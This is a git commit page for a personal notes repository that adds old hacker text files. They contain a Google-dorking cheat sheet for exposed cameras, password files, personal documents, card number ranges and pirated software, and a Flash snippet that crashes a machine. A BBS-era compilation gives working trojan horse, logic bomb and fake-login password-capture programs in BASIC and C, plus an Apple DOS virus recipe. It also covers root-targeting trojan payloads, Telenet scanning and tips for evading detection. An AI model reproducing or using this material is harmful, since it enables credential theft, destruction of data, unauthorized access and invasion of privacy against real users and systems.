itdominator/Notes
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Initial push...

Browse Source
This commit is contained in:
maximstewart
2021-02-20 19:25:30 -06:00
parent 5c13d22216
commit be147b0294
482 changed files with 112377 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3367
src/Security/Technical Papers and Notes/Docs/Beta .007 - Hack F.A.Q.txt Executable file
View File

File diff suppressed because it is too large Load Diff

140
src/Security/Technical Papers and Notes/Docs/Google Cheat sheet 1.txt Executable file
View File

@@ -0,0 +1,140 @@
How to use Google for Hacking.
Google serves almost 80 percent of all search queries on the Internet, proving itself as the most popular search engine. However Google makes it possible to reach not only the publicly available information resources, but also gives access to some of the most confidential information that should never have been revealed. In this post I will show how to use Google for exploiting security vulnerabilities within websites. The following are some of the hacks that can be accomplished using Google.
1. Hacking Security Cameras
There exists many security cameras used for monitoring places like parking lots, college campus, road traffic etc. which can be hacked using Google so that you can view the images captured by those cameras in real time. All you have to do is use the following search query in Google. Type in Google search box exactly as follows and hit enter
inurl:”viewerframe?mode=motion”
Click on any of the search results (Top 5 recommended) and you will gain access to the live camera which has full controls.
you now have access to the Live cameras which work in real-time. You can also move the cameras in all the four directions, perform actions such as zoom in and zoom out. This camera has really a less refresh rate. But there are other search queries through which you can gain access to other cameras which have faster refresh rates. So to access them just use the following search query.
intitle:”Live View / AXIS”
Click on any of the search results to access a different set of live cameras. Thus you have hacked Security Cameras using Google.
2. Hacking Personal and Confidential Documents
Using Google it is possible to gain access to an email repository containing CV of hundreds of people which were created when applying for their jobs. The documents containing their Address, Phone, DOB, Education, Work experience etc. can be found just in seconds.
intitle:”curriculum vitae” “phone * * *” “address *” “e-mail”
You can gain access to a list of .xls (excel documents) which contain contact details including email addresses of large group of people. To do so type the following search query and hit enter.
filetype:xls inurl:”email.xls”
Also its possible to gain access to documents potentially containing information on bank accounts, financial summaries and credit card numbers using the following search query
intitle:index.of finances.xls
3. Hacking Google to gain access to Free Stuffs
Ever wondered how to hack Google for free music or ebooks. Well here is a way to do that. To download free music just enter the following query on google search box and hit enter.
“?intitle:index.of?mp3 eminem“
Now youll gain access to the whole index of eminem album where in you can download the songs of your choice. Instead of eminem you can subtitute the name of your favorite album. To search for the ebooks all you have to do is replace “eminem” with your favorite book name. Also replace “mp3″ with “pdf” or “zip” or “rar”.
4. Using Google, and some finely crafted searches we can find a lot of interesting information.
For Example we can find:
Credit Card Numbers
Passwords
Software / MP3s
…… (and on and on and on) Presented below is just a sample of interesting searches that we can send to google to obtain info that some people might not want us having.. After you get a taste using some of these, try your own crafted searches to find info that you would be interested in.
Try a few of these searches:
intitle:”Index of” passwords modified
allinurl:authuserfile.txt
“access denied for user” “using password”
“A syntax error has occurred” filetype:ihtml
allinurl: admin mdb
“ORA-00921: unexpected end of SQL command”
inurl:passlist.txt
“Index of /backup”
“Chatologica MetaSearch” “stack tracking:”
Amex Numbers: 300000000000000..399999999999999
MC Numbers: 5178000000000000..5178999999999999
visa 4356000000000000..4356999999999999
“parent directory ” /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory “Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
Notice that I am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.
METHOD 2
put this string in google search:
?intitle:index.of? mp3
You only need add the name of the song/artist/singer.
Example: ?intitle:index.of? mp3 jackson
METHOD 3
put this string in google search:
inurl:microsoft filetype:iso
You can change the string to watever you want, ex. microsoft to adobe, iso to zip etc…
“# -FrontPage-” inurl:service.pwd
Frontpage passwords.. very nice clean search results listing !!
“AutoCreate=TRUE password=”
This searches the password for “Website Access Analyzer”, a Japanese software that creates webstatistics. For those who can read Japanese, check out the authors site at: coara.or.jp/~passy/ [or.jp]
“http://:@www” domainname
This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the the domain name without the .com or .net
“http://:@www” bangbus or “http://:*@www”bangbus
Another way is by just typing
“http://bob:bob@www”
“sets mode: +k”
This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs.
allinurl: admin mdb
Not all of these pages are administrators access databases containing usernames, passwords and other sensitive information, but many are!
allinurl:authuserfile.txt
DCForums password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)
intitle:”Index of” config.php
This search brings up sites with “config.php” files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database.
eggdrop filetype:user user These are eggdrop config files. Avoiding a full-blown descussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users.
intitle:index.of.etc This search gets you access to the etc directory, where many many many types of password files can be found. This link is not as reliable, but crawling etc directories can be really fun!
filetype:bak inurl:”htaccess|passwd|shadow|htusers” This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version). Every attacker knows that changing the extenstion of a file on a webserver can have ugly consequences.
Lets pretend you need a serial number for windows xp pro.
In the google search bar type in just like this “Windows XP Professional” 94FBR
the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of fake porn sites that trick you.
or if you want to find the serial for winzip 8.1 “Winzip 8.1″ 94FBR
Credits and More Info http://johnny.ihackstuff.com
I have shown you this info to let you know that there is a real risk putting your info online. If you do want to buy stuff online make sure the site you are using is secure normally if a site is secure you will see a pop up saying you are now entering a secure part of the site or a symbal of a padlock at the bottom of your browser or just use pay pal, pay pal is very safe to use. But most of the time just use common sense if a site looks cheap it normally hasnt got the protection to keep your info safe. I am not saying dont buy stuff online because that is one of the best things about the internet i am just saying be aware of websites that want your bank details and there is no symbal of a padlock at the bottom of your browser
5.Crash a Computer using Flash and Google.
Open up a new flash document. Open up the Actions panel for the stage of the first frame. If its in Actionscript 2, write the following:
onEnterFrame = function () {
getURL(“http://www.google.com”, “_blank”);
}
Or if its actionscript 3 write the following:
function openGoogle(e:Event):void {
navigateToURL(“http://www.google.com”, “_blank”);
}
stage.addEventListener(Event.ENTER_FRAME, openGoogle);
Press Control-Enter when youre ready to crash your computer. What this does is repeatedly open up new tabs of Google. But it opens so many Google tabs every second that after maybe 20-30 seconds your computer will barely be able to respond to you mouse clicks or even mouse movements. Usually, any attempt to stop it will result in processing overload and cause the computer to freeze. The only real way to stop this is to force-quit BOTH flash.exe and iexplorer.exe. Some teachers may know enough to do this, but might accidentally close explorer.exe
hope you enjoyed this post. Pass your comments. Cheers!

BIN
src/Security/Technical Papers and Notes/Docs/Hacker Jargon.odt Executable file
View File

Binary file not shown.

836
src/Security/Technical Papers and Notes/Docs/Legacy Hacking.txt Executable file
View File

@@ -0,0 +1,836 @@
Filename = BBSFILES.DOC
THE FOLLOWING FILES WERE DOWNLOADED BY ME IN ONE EVENING, USING AN IBM-PC AND
MODEM. THEY WERE DOWNLOADED TO SHOW THE NATURE OF THE INFORMATION READILY
AVAILABLE TO THE THOUSANDS WHO ACCESS HACKER BOARDS - PROVIDED FOR
EDUCATIONAL PURPOSES ONLY, AND NOT TO RECOMMEND OR IMPLY ANY ILLEGAL USE
WHATSOEVER. THESE FILES JUST RELATE TO COMPUTER PHREAKING. THERE ARE MANY
MORE ON PHONE BOXING, WEAPONRY AND EXPLOSIVES, LOCKPICKING - YOU NAME IT!
(we are very interested in increasing this file for future updates of
COMPUTER PHREAKING and, separately, adding similar files for our PHONE COLOR
BOXES, and other technical and survival topics we have interest in (see our
catalog). If you have some good public domain info. for us, please send it
to us in an ASCII file(s), on 5.25" or 3.5" disk (use First Class Mail only),
to: CONSUMERTRONICS, 2011 Crescent Dr., P.O. Drawer 537, Alamogordo, NM
88310. If you require compensation for your help, let us know in advance
what you have and woa| yot w/uud lika for io)>
D/L1------------------------------
Virus, Trojan Horse, and Decoy Programs:
DEC MAINFRAMES:
===============
The following were devolped and tested on DEC Basic Plus, running under
the RSTS/E Operating system. All have been tested, and were sucessfully used
in the field. However, sucessful use depends on the savvy of the sysop,
legitimate users, and illegitimate ones. They work best on uninformed
(stupid) users and sysops, and when the hacker using them makes them
attractive, as when using trojan horses, or realistic, when using decoys.
TROJAN HORSE:
=============
What follows is a rough listing of the business end of a typical trojan
horse program. While this one just lowers the security of the programs on
the affected account, it could be easily modified to create another account,
or execute any other command. The key is the 'sy$=sys(chr$(14)+"....")'
statement. In BASIC PLUS Programming language, this command lets you execute
a DCL command from within a BASIC Program. Therefore, any DCL command, COPY,
DELETE, PIP, or even BYE could be inserted in the "...." space. I prefer
using PIP *.* <40> /RE, as what that will do is lower the protection codes
low enough for me to see the files on the account. This works with both
sysops and non-privlidged users, so I can benefit whenever someone runs it,
as opposed to something the sysop has to run in order for it to do whatever.
As a plus, if a sysop runs it, certain hidden files on the [1,*] account he/
she's using will become visible, which will, provided you know what you're
doing, enable you to get sysop status. Of course, you could also use PIP
[*,*] *.* <40> /RE, which, if a sysop runs it, will lower the protection of
every file on the system, one would have to add an error checking routine in
case a non-sysop ran it.
10 extend
20 sy$=sys(chr$(14)+"PIP *.* <40> /RE") 30 rem the following would be the
interesting little game you've wrote which 40 rem makes the program look
atractive, and compels the hapless user to 50 rem run it. 60 end
LOGIC BOMB:
===========
The following is an example of a simple logic bomb, which has proven to
Work very well. What it does is create a file on the effected account which
will delete all files on the account upon the next login, it also dumps the
user off the system for good measure, you could remove the logoff procedure,
and not affect program operating, but they then stand a chance of noticing
the little file you've added.
10 extend
20 open "login.com" as file #1
30 print #1,"pip *.* <60> /re"
40 print #1,"delete *.*"
50 close #1
60 sy$=sys(chr$(14)+"bye/f")
70 end
Now, line 30 is optional in this program. I have included it in case the
user has protected his files from accidental deletion. There is one instance
in which this program won't work properly. This is when the defualt language
upon logon isn't DCL, on occasion, some systems have BASIC as the default. In
this case, just add the following line.
25 print #1,"sw dcl"
And you'll switch to DCL before continuing to the rest of the program.
THE DECOY:
==========
This decoy is to be used on local terminals, ones that are connected to
the system via RS-232, such as in schools. It is also the riskiest of these
programs to use. What it basicly does is wait until input, and then act as a
login program, saving the users id# and password. Upon getting it, it informs
the user of an "invalid entry" and then returns control to the system. There
are a number of things to keep in mind when using this program. The first is
to change the program so it looks like your system. The second is to
remember that it runs under the account it's on, therefore you take a risk of
someone hitting [Break] while it's running, and getting into your account.
Finally, due to the BASIC language, you'll only get the project number of the
account (what's before the comma). However, since you'll have the password,
you'll get it in less than 255 tries.
10 extend
20 open "kb:" as file #1%
30 input #1%, z$
40 print "RSTS v8.0-06 MICOM I Job <10> KB31: ";date$(0);" ";time$(0)
50 print
60 print "Username: ";
70 input #1%, u$
80 print "Password: ";
90 sy$=sys(chr$(3))
100 input #1%, p$
110 sy$=sys(chr$(2))
120 print: print "Invalid Entry - Try Again"
130 print: print
140 print "Username: ";
150 input #1%, r$
160 sy$=sys(chr$(3))
170 print "Password: ";
180 input #1%, s$
190 sy$=sys(chr$(2))
200 open "acct.txt" as file #2
210 print #2,u$
220 print #2,p$
230 print #2,r$
240 print #2,s$
250 close #2
260 print: print "Access Denied"
270 sy$=sys(chr$(14)+"bye/f")
280 end
The parts which have to be changed are line 40, and the number of tries
it allows before logging you off. The system I used for devolpment allowed
only two tries, and most I've seen only allow two, but, it isn't always that
way. Finally, remember to save ALL input, for reasons which should be
obvious.
FREE MEMORY:
============
While this program isn't classified as a trojan horse, decoy, logic
bomb, or virus. It's quite interesting, and I've decided to include it. This
program enables you to look at unallocated space on the system's disk. It's
very useful when the sysop is creating and deleting accounts, and in schools
in order to yank deleted files, which happens when students are modifying
programs.
10 open "free.mem" as file #1%
20 put #1%, record nnnnn%
30 close #1%
GENERAL NOTES ON PC VIRUSES
===========================
Writing "funny programs" on PCs is a big pain-in-the-a__. There are two
major reasons why. The first is that most users know their PCs(Personal
Computers in general, not just IBM) like the back of their hand, and that any
wierdness would be immediately noticed, unlike a big multiuser system, where
there are amoungst other users, and basicly isolated in their own little
section of RAM. Secondly, they have to be extremly small, as to be hidden
effectively. While one can write the perfict virus with 64k, try writting
one in a few bytes of space. Personally, I feel the best way to screw over a
computer user is to put a magnet to his disks, but if you want to do it the
hard way, it is possible.
APPLE II+, //e. //c:
====================
The Apple series of computers is one of the simplest machines to
"infect", so to speak. Perhaps this is because it creator was a prima donna
hacker, but who knows. DOS 3.3 has several unsed spots in it, which are
adequete to hide a virus in. They are (in hex) $B78D-$B792 and $BCDF-$BCFF.
You can also, on pre-1983 versions of DOS 3.3, use BA69-BA93. There are also
some spots which aren't unused, but are used for such DOS commands such as
VERIFY, LOCK, UNLOCK, CHAIN, and MAXFILES. The classic virus program on the
Apple a machine language program which counts how many times someone does a
certain function, such as CATALOG, LOAD, or SAVE, and upon reaching a certain
number, initializes the disk. It is based in DOS memory, which means that
once the affected disk is booted, it stays in the machine until power down,
and can affect any disk which is used with said machine. It will also be
transfered to any disk which is initalized by the machine. The actual program
is very simple, provided you know 6502 machine language. What you do is make
a patch to the Command handler entry point for the Catalog command. The
location for the command handler is from $9D1E to $9D55. Look around in
there until you find a string which says "6EA5" this is the entry point for
the Catalog Handler, which is $A56E. Remember that. Change it to the
beginning of your "modification". I recommend $BCDF, since it is the bigest
stretch of memory which is truly safe. You then write a program which will
do an LDX (Load X Register) from a memory location where you're counter is,
say $B78D. You compare that memory to the number of times you want the
command to go through before deletion, say 20 hex. (CPA $20) if the number of
times is greater than the the number in the Compare statement ($20) then jump
to the init subroutine (BPL $4F5A)(The INIT start location is $5A4F), if not,
then Increment the X Register by 1 (INX $01), store it (STX $8DB7), you then
continue with your program by Cataloging the disk (JMP $6EA5). End of
program. I have found this to be one of the best virus programs, as these
things go.
D/L2---------------------------------------
COMMENTS ON "SMART" HACKING:
---------------------------
Never trust a change in a system. The 414s, the (expletive deleted),
were caught for this reason: When one of them connected to the system, there
was nothing good there. The next time, there was a Trek game stuck right in
their way! They proceeded to play said game for two, say two and half hours,
while TELENET was tracing them! Nice job, don't you think? If anything
looks suspicious, drop the line immediately!! As in Yesterday!! The point
we're trying to get across is: If you use a little common sense, you won't
get busted. Let the little kids who aren't smart enough to recognize a trap
get busted, it will take the heat off the real hackers. Now, let's say you
get on a computer system... it looks great, checks out, everything seems
fine. Ok, now is when it gets more dangerous. You have to know the computer
system (see future issues of this article for info on specific systems) to
know what not to do. Basically, keep away from any command which looks like
it might delete something, copy a new file into the acoount, or whatever!
Always leave the account in the same status you logged in with. Change
*nothing*... If it isn't any account with priv's (privileged access) then
don't try any commands that require them! All, yes, all systems are going to
be keeping log files of what users are doing, and that will show up. It is
just like dropping a trouble-card in an ESS system, after sending that nice
operator a pretty tone. Spend no excessive amounts of time on the account in
one stretch. Keep your calling to the very late night if possible, or during
business hours (believe it or not!). It so happens that more users are on
during business hours, and it is very difficult to read a log file with 60
users doing many commands every minute. Try to avoid systems where everyone
knows each other. Don't try to bluff. And above all: Never act like you
own the system, or are the best there is. They always grab the people who's
heads swell...
There is some very interesting front end equipment arownd nowadays. But
first let's define terms... By front end, we mean any device that you must
pass thru to gat at the real computer. There are devices that are made to
defeat hacker programs and just plain old multiplexers. To defeat hacker
programs, there are now devices that pick up the phone and just sit there...
This means that your device gets no carrier, thus you think there isn't a
computer on the other end. The only way around it is to detect when it was
picked up. If it picks up after the same number ring, then you know it is a
hacker-defeater. These devices take a multi-digit code to let you into the
system. Some are, in fact, quite sophisticated to the point where it will
also limit the user name's down, so only one name or set of names can be
valid logins after they input the code... Other devices input a number code,
and then they dial back a pre-programmed number for that code. These systems
are best to leave alone, because they know someone is playing with their
phone. You may think "But I'll just reprogram the dial-back." Think again,
how stupid that is... Then they have your number, or a test loop if you were
just a little smarter. If it's your number, they have your (expletive
deleted) (if male), if it's a loop, then you are screwed again, since those
loops are "monitored."
As for multiplexers... what a plexer is supposed to do is this: The system
can accept multiple users. We have to time share, so we'll let the front-end
processor do it... Well, this is what a multiplexer does. Usually they will
ask for something like "enter class" or "line:". Usually, it is programmed
for a double digit number, or a 4 or 5 letter word. There are usually a few
sets of numbers it accepts, but those numbers also set your 300/1200 baud
data type. These multiplexers are inconveneint at best, so not to worry.
A little about the history of hacking: Hacking, by our definition, means a
great knowledge of some special area. Doctors and lawyers are hackers of a
sort, by this definition. But most often, it is being used in the computer
context, and thus we have a dedinition of "anyone who has a great amount of
computer or telecommunications knowledge." You are not a hacker because you
have a list of codes... Hacking, by our defintion, has been around only
about 15 years. It started, where else but, MIT and colleges where they had
Computer Science or Electrical Engineering departments. Hackers have created
some of the best computer languages, the most awesome operating systems, and
even gone on to make millions. Hacking used to have a good name, when we
could honestly say "We know what we are doing." Now it means (in the public
eye): The 414s, Ron Austin, the NASA hackers, the ARPANET hackers... all the
people who have been caught. thus we come past the moralistic crap, and to
our purpose: Educate the hacker community...........
D/L3----------------------------
UNIX TROJAN HORSE - By Shooting Shark
-------------------------------------
This program simulates the login for a UNIX machine. However, the login
and password are written to a file in your directory. The user geat a "login
incorrect" message and thinks they have mis-typed their password. They are
given a second chance, but the new 'login:' prompt is the real one - they
then get access to their account and are none the wiser.
You must be running a fairly robust version of UNIX. 4.2 or 4.3bsd, or AT&T
System V are fine. I wrote this one on a Pyramid 90x32 bit system running
the above flavors of UNIX. It works fine for me and should work on your
system fine with no modification.
To run the program, enter the source given below in a file called 'horse.c'
and configure it as necessary (see below). Then, from the shell promp, type:
cc horse.c -lcurses -ltermcap (to compile the program)
then type:
mv a.out horse (to rename the object code.)
Voila, you now have a program which can be tested by typing 'horse'.
However, in order for the program to work properly, it must be called from a
shellscript. Create a file calle script and enter these two lines:
horse (invokes your program)
login
Now, type:
source script (run the shell script)
to execute the above file. The horse program will be run. It will simulate
the login process. After completing its task it will invoke the REAL login
process.
If you wish, you can tack the above two lines to your ".logout" file (the
shellscript which is executed when you log out) so the program will be
automatically executed each time you log out normally.
----Source Begins Here----
#include <curses.h>
#include <signal.h>
int stop();
main()
[
char name[10], password[10];
int i;
FILE *fp, *fpopen();
signal(SIGINT,stop);
initscr();
printf("\n\nTiburon Systems
4.2/Sys V UNIX (tiburon)\n\n\n\nlogin:");
/*The above line is very important - it prints the header that your machine
prints when it greets the world. Change this line so it says what your
machine would say. Each \n is a carriage return*/
scanf("%[^\n]",name)
getchar();
noecho();
printf("Password:");
scanf("%[^\n]',password),
printf("\n");
getchar();
echo();
sleep(5);
/*sleep(x) is the delay between prompting for a password and printing "Login
incorrect." Change it so it looks like your login routine's speed*/
if ( ( fp = fopen("stuff","a") ) ! = -1 ) [
fprintf(fp,"login %s has password %s\n",name,password);
fclose(fp); ]
printf("Login incorrect\n");
endwin(); ]
stop() [ /*the ^C trap.*/
exit(0); ]
----Source Ends Here----
OK. After you have run the program successfully and people have fallen for
it, a file called "stuff" will have a table of all login name/password
combinations snagged. (This file can be incriminating so delete it whenever
necessary.)
This program traps ^C's entered by suspicious users. However, it can't catch
a ^Z (STOP signal) so it is vulnerable to them. If somebody stops your
program, they will be in your account and your little game will be up. Also,
take care that you are using a terminal that times out after a few minutes
while waiting for somebody to come up to the terminal you're running it on.
D/L4--------------------------
THIS IS YET ANOTHER SHOOTING SHARK CONTRIBUTION TO UNIX INSECURITY
Introduction
------------
"UNIX Security" is an oxymoron. It's an easy system to brute-force hack
(most UNIX systems don't hang up after x number of login tries, and there are
a number of default logins, such as root, bin, sys and uucp). Once you're in
the system, you can easily bring it to its knees (see my previous Phrack
article, "UNIX Nasty Tricks") or, if you know a little C, you can make the
system work for you and totally eliminate the security barrier to creating
your own logins, reading anybody's files, etc. This file will outline such
ways by present C code that you can implement yourself.
Requirements
------------
You'll need a working account on a UNIX system. It should be a farily
robust version of UNIX (such as 4.2bsd or AT&T System V) running on a real
machine (a PDP/11, VAX, Pyramid, etc) for the best results. If you go to
school and have an account on the school system, that will do perfectly.
Notes
-----
This file was inspired by an article in the April, '86 issue of BYTE
entitled, "Making UNIX Secure." In the article, the authors way "We provide
this information in a way that, we hope, is interesting and useful yet stop
short of being a 'cookbook for crackers.' We have often intentionally
omitted details." I am following the general outline of the article, giving
explicit examples of the methods they touched on.
Project One: Fishing for Passwords
-----------------------------------
You can implement this with only a minimal knowledge of UNIX and C.
However, you need access to a terminal that many people use - the computer
lab at your school, for example. When you log onto a typical UNIX system,
you see something like this:
Tiburon Systems 4.2bsd / System V
(shark)
login: shark
Password (the password is not printed)
The program I'm giving you here simulates a logon sequence. You run the
program from a terminal and then leave. Some unknowing fool will walk up and
enter their login and password. It is written to a file of yours, then
"login incorrect" is printed, then the fool is asked to log in again. The
second time it's the real login program. This time the person succeeds and
they are none the wiser.
On the system, put the following code into a file called 'horse.c'. You will
need to modify the first 8 lines to fit your system's appearance.
----Code Begins Here----
#define SYSTEM "\n\nTiburon Systems 4.2bsd UNIX (shark)\n\n"
#define LOGIN "login: "
/*The above is the login prompt. You shouldn't have to change it unless
you're running some strange version of UNIX*/
#define PASSWORD "password:"
/*The above is the password prompt. You shouldn't have to change it,
either*/
#define WAIT 2
/*The numerical value assigned to WAIT is the delay you get after "password:"
Change it (0 = almost no delay. 5 = long delay) so it looks like your
system's delay. Realism is the key here - we don't want our target to become
suspicious.*/
#define INCORRECT "Login incorrect.\n"
/*Change the above so it is what your system says when an incorrect login is
given. You shouldn't have to change it.*/
#define FILENAME "stuff"
/*FILENAME is the name of the file that the hacked passwords will be put into
automatically. 'stuff' is a perfectly good name. Don't change the rest of
the program unless there is a need to and you know C*/
#include <curses.h>
#include <signal.h>
int stop();
main() [
char name[10], password[10];
int i;
FILE *fp, *fpopen();
signal(SIGINT,stop);
initscr();
printf(SYSTEM);
printf(LOGIN);
scanf("%[^\n]",name)
getchar();
echo();
sleep(WAIT);
printf("\n");
getchar();
echo();
if ( ( fp = fopen(FILENAME,"a") ) ! = NULL) [
#fprintf(fp,"login %s has password %s\n",name,password);
#fclose(fp);
#]
printf(INCORRECT);
endwin(); ]
stop() [
endwin();
exit(0); ]
----Source Ends Here----
OK, as I said, enter the above and configure it so it looks exactly like your
system's login sequence. To compile this program called 'horse.c' type the
following two lines: (don't type the %s, they are just a sample prompt)
% cc horse.c -lcurses -ltermcap
% mv a.out horse
You now have the working object code in a file called 'horse'. Run it, and
if it doesn't look like your systems logon sequence, re-edit horse.c and re-
compile it. When you're ready to put the program into use, create a new file
and call it 'trap' or something. 'trap' should have these two commands:
horse (runs your program)
login (runs the real login program)
to execute 'trap' type:
% source trap (again, % is just the prompt)
and walk away from your terminal.
After you've run it successfully a few times, check your file called 'stuff'
(or whatever you called it). It will look like this:
user john has password secret
user mary has password smegma
.
.
.
Copy down these passwords, then delete this file (it can be VERY
incriminating if the superuser sees it).
Note - for best results your terminal should be set to time-out after a few
minutes of non-use - that way, your horse program doesn't run idle for 14
hours if nobody uses the terminal you ran it on.
The next projects can be run on a remote system, such as the VAX in Michigan
you've hacked into, or Dartmouth's UNIX system, or whatever. However, they
require a little knowledge of C language. They're not something for UNIX
novices.
Project Two: Reading Anybocy's Files
------------------------------------
When somebody runs a program, they're the owner of the process created
and that program can do anything they would do, such as delete a file in the
directory or making a file of theirs available for reading by anybody.
When people save old mail they get on a UNIX system, it's put into a file
called "mbox" in their home directory. This file can be fun to read but is
usually impossible for anybody but the file's owner to read. Here is a short
program that will unlock (ie: chmod 777, or let anybody on the system read,
write or execute) the mbox file of the person who runs the program:
----Code Begins Here----
#include <pwd.h>
struct passwd *getpwnam(name);
struct passwd *p;
char buf [255];
main() [
p = getpwnam(getlogin());
sprintf(buf,"%s/%s",p->pw_dir,"mbox");
if ( access(buf,0) >-1 ) [
sprintf(buf,"chmod 777%s/%s",p->pw_dir,"mbox");
system(buf); ]
]
So the question is: How do I get my target to run this program that's in my
directory?
If the system you're on has a public-messages type of thing (on 4.xbsd, type
'msgs') you can advertise your program there. Put the above code in another
program (ie: IMPLANT A TROJAN HORSE) - find a utility or game program in some
magazine like UNIX WORLD and modify it and do the above before it does it's
real thing. so, if you have a program called tic-tac-toe and you've modified
it to unlock the mbox file of the user before it plays tic-tac-toe with him,
advertise "I have a new tic-tac-toe program running that you should all try.
It's in my directory." or whatever. If you don't have means of telling
everybody on the system via a public message, then just send mail to the
specific people you want to trap.
If you can't find a real program to modify, just take the above program and
add this line between the two ']' at the end of the program:
printf("Error opening tic-tac-toe data file.")
when the program runs, it will print the above error message. The user will
think "Heh, that dude doesn't know how to write a simple tic-tac-toe
program!" but the joke's on him - you can now read his mail.
If there's a specific file in a user's directory that you'd like to read (say
it's called "secret") just throw together this general program:
main() [
if ( access("secret",0) > -1 )
system("chmod 777 secret"); ]
then 'talk' or 'write' to him and act like Joe Loser: "I wrote this program
called super_star_wars, will you try it out?"
Use your imagination. Think of a command you'd like somebody to execute.
Then put it inside a system() call in a C program trick them into running
your program!
Here's a very neat way of using the above technique:
Project Three: Become the Superuser
------------------------------------
Write a program that you can get people to run. Put this line in it
somewhere:
if ( !strcmp(getlogin(),"root") )
system("whatever you want");
This checks to see if the root login is running your program. If he is, you
can have him execute any shell command you'd like. Here are some
suggestions:
"chmod 777 /etc/passwd"
/etc/passwd is the system's password file. The root owns this file.
Normally, everyone can read it (the passwords are encrypted) but only the
root can write to it. Take a look at it and see how it's formatted if you
don't know already. This command makes it possible for you to write to the
file (ie: create unlimited accounts for yourself and your friends).
"chmod 666 etc/group"
By adding yourself to some high-access groups, you can open many doors.
"chmod 666 /usr/lib/uucp/L.sys"
Look for this file on your system if it is on the uucp net. It contains
dialups and passwords to other systems on the net, and normally only the uucp
administrator can read it. Find out who owns this file and get him to
unknowingly execute a program to unlock it for you.
If you can get the root to execute this command, the system's passwd file
will be removed and the system will go down and will not come up for some
time to come. This is very destructive.
If you are going to go about adding a trojan horse program to the system,
there are some rules you should follow. If the hidden purpose is something
major (such as unlocking the user's mbox or deleting all of his files or
something) this program shouldn't be a program that people will be running a
lot (such as a popular computer game) - once people discover that their files
are public access the source of the problem will be discovered quite easily.
Save this purpose for a 'test' program (such as a game you're in the process
of writing) that you ask individual people to run via mail or 'chatting' with
them. As I said, this 'test' program can bomb or print a phony error message
after completing its task, and you will just tell the person "well, I guess
it needs more work", wait until they log off, and then read whatever file of
theirs that you've unlocked. If your trojan horse program's sole purpose is
to catch a specific user running it - such as the root or other high-powered
user - you can put the code to do so in a program that will be run a lot by
various users of the system. Your modification will remain dormant until he
runs it. If you can't find the source to 'star trek' or whatever in C, just
learn C and convert something from pascal. It can't hurt to learn C as it's
a great language. We've just seen what it can do on a UNIX system. Once
you've caught the root (ie: you can now modify the /etc/passwd file) remove
the spurious code from your trojan horse program and you'll never be caught.
D/L5----------------------------
TELENET HACKING
PREFACE:
--------
TELENET is a huge network which lets you enter another computer via
TELENET's and costs a little extra to those who log-on to their own
connection and account (but of course we shall ignore that).
HACKING:
--------
First dial your local TELENET dial up - here is just a few
BUFFALO (716) 847-0600
CHICAGO (312) 938-0500
DETROIT (313) 964-5538
964-2089
MANHATTAN (212) 736-0099
947-9600
785-2540
ROCHESTER (716) 454-3430
454-1020
WASHINGTON DC (202) 347-1400
(703) 435-3333
WHITE PLAINS (914) 328-9199
If your area is not listed contact your local phracker (phreaker/hacker) and
ask him if he has a local dial-up for your area.
Once you log on <RETURN> and it will ask you for a terminal identifier. You
can type "D1" if you are using a PC or just hit <RETURN>.
There are thousands of computer systems connected to TELENET, all you need to
do is type their connection number.
The format is: C NPAXX or C NPAXXX where:
C is the abbreviation for "Connection"
NPA is the area code of the computer system you wish to find
XX or XXX is an 2, and sometimes 3 digits
So, to search for a computer in 202, you would hack from 20201 up to 20299
and 202001 to 202999.
RESPONSE:
---------
Once you dial the connection number of what you hope is a computer
system, you will most likely get one of the following responses (we will use
21211 as an example):
"?" - You typed in something wrong (see format)
"212 11 ILLEGAL ADDRESS" - There is no computer system at 212 11 (try
another)
"212 11 CONNECTED" - You are now connected to the system at 212 11 and
should proceed)
"212 11 NOT RESPONDING" - There is a computer system at 212 11 but it is
not working now (try later)
"212 11 NOT REACHABLE FROM..." - There is a computer system at 212 11 but
it cannot be reached by this TELENET dial-up (try a different dialup)
"212 11 DOES NOT ACCEPT COLLECT CALLS" and
"212 11 DOES NOT ACCEPT COLLECT CALLS. PLEASE ESTABLISH A PAID CALLER
ACCOUNT" - In most cases the computer system will aceept collect calls from
whomever calls them, but a few require you to establish a specific log on
with TELENET first to place a paid call to a given connection.
COMMANDS
--------
Here is a short summary of TELENET commands.
COMMAND EFFECT
------- ------
FULL Sets net to full duplex (no echo)
HALF Sets net to half duplex (echo)
D Disconnect from node if still attached
CONTINUE Continue on system if still attached
ID Unknown. Maybe an ANI for nodes with security checking
Commands may be typed in upper or lower case.
You must first get the TELENET's attention to use the commands if you are
still attached to a node. The sequence of commands are:
<RETURN> (will be followed by a "@")
<RETURN> (if correct, the word "TELENET" should appear as well as
another "@")
COMMENTS:
---------
TELENET is a rather safe network to hack off of because the locations
usually cannot trace you and if they do, can probably not trace you thru
TELENET. Also, if a computer system is far away and you wish to log onto it,
there is no extra cost other than the cost to call TELENET.
D/L6--------------------------
TRASHING TECHNIQUES VOLUME i
PREFACE:
--------
This volume will deal with the basics of trashing.
You might be saying, "What is trashing? And why should I trash?".
Trashing is, to put it bluntly, the "inspection" of companies, schools,
peoples, etc. trash dumsters for the purpose of finding important material
that a person might find useful. (SOME MAY REASON THAT IF TRASHING IS GOOD
ENOUGH FOR THE POLICE TO DO, ACCORDING TO THE U.S. SUPREME COURT, THEN IT
MUST BE GOOD ENOUGH FOR THE PEOPLE TO DO)
